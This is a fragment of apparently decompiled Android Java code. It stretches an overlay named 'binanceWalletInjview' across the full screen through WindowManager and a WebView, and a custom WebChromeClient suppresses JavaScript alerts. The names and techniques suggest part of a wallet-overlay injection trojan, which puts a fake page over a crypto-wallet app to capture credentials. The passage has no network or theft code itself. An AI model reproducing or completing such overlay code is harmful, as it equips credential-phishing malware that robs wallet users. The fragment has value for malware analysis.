if (ifWebViewFullScreen) {
return;
}
if (z) {
ViewGroup.LayoutParams layoutParams = webView.getLayoutParams();
layoutParams.height = ScreenUtil.getScreenHeight(context);
webView.setLayoutParams(layoutParams);
}
binanceWalletInjviewLayoutParams.width = -1;
binanceWalletInjviewLayoutParams.height = -1;
binanceWalletInjviewLayoutParams.y = 0;
windowManager.updateViewLayout(binanceWalletInjview, binanceWalletInjviewLayoutParams);
ifWebViewFullScreen = true;
}
public static class MyWebChromeClient extends WebChromeClient {
@Override
public boolean onJsAlert(WebView webView, String str, String str2, JsResult jsResult) {
return true;
}
private MyWebChromeClient() {
}
}
}